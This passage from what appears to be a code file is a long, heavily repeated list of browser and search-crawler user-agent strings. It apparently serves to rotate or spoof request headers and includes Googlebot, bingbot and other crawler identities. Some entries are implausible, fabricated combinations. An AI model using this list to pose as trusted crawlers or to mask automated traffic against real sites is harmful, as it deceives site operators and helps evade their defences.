Presto/2.8.131 Version/11.10', 'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)', 'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007', 'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)', 'Googlebot/2.1 (http://www.googlebot.com/bot.html)', 'Opera/9.20 (Windows NT 6.0; U; en)', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)', 'Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16', 'Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13', 'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)', 'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)', 'Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)', 'YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)', 'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57', 'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0', 'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g', 'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125', 'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)', 'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)', 'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)', 'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0', 'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', 'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16', 'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)', 'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7', 'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0', 'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)', 'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)', 'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10', 'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)', 'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007', 'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57', 'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0', 'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g', 'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125', 'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)', 'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)', 'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)', 'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0', 'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', 'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16', 'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)', 'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7', 'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0', 'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)', 'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)', 'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10', 'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)', 'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007', 'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179', 'Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) AddSugarSpiderBot www.idealobserver.com', 'Mozilla/5.0 (compatible; AnyApexBot/1.0; +http://www.anyapex.com/bot.html)', 'Mozilla/4.0 (compatible; Arachmo)', 'Mozilla/4.0 (compatible; B-l-i-t-z-B-O-T)', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)', 'Mozilla/5.0 (compatible; BecomeBot/2.3; MSIE 6.0 compatible; +http://www.become.com/site_owners.html)', 'BillyBobBot/1.0 (+http://www.billybobbot.com/crawler/)', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 'Sqworm/2.9.85-BETA (beta_release; 20011115-775; i686-pc-linux-gnu)', 'Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)', 'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)', 'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )', 'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )', 'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.zyborg@looksmart.net; http://www.WISEnutbot.com)', 'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.dlc@looksmart.net; http://www.WISEnutbot.com)', 'Mozilla/4.0 compatible ZyBorg/1.0 (wn-16.zyborg@looksmart.net; http://www.WISEnutbot.com)', 'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser 1.98.744; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; Acoo Browser; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Acoo Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko, Safari/419.3) Cheshire/1.0.ALPHA', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) ChromePlus/4.0.222.3 Chrome/4.0.222.3 Safari/532.2', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 ChromePlus/1.5.1.1', 'Links (2.7; Linux 3.7.9-2-ARCH x86_64; GNU C 4.7.1; text)', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A', 'Mozilla/5.0 (PLAYSTATION 3; 3.55)', 'Mozilla/5.0 (PLAYSTATION 3; 2.00)', 'Mozilla/5.0 (PLAYSTATION 3; 1.00)', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:24.0) Gecko/20100101 Thunderbird/24.4.0', 'Mozilla/5.0 (compatible; AbiLogicBot/1.0; +http://www.abilogic.com/bot.html)', 'SiteBar/3.3.8 (Bookmark Server; http://sitebar.org/)', 'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)', 'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)', 'Mozilla/4.0 (compatible; WebCapture 3.0; Macintosh)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) (Prevx 3.0.5) ', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.6+2.0.0.8-Oetch1)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {1C69E7AA-C14E-200E-5A77-8EAB2D667A07})', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; acc=baadshah; acc=none; freenet DSL 1.1; (none))', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.51', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; snprtz|S26320700000083|2600#Service Pack 1#2#5#154321|isdn)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar; mxie; .NET CLR 1.1.4322)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051010 Firefox/1.0.7 (Ubuntu package 1.0.7)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57', 'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0', 'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g', 'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125', 'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)', 'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)', 'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)', 'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0', 'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', 'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 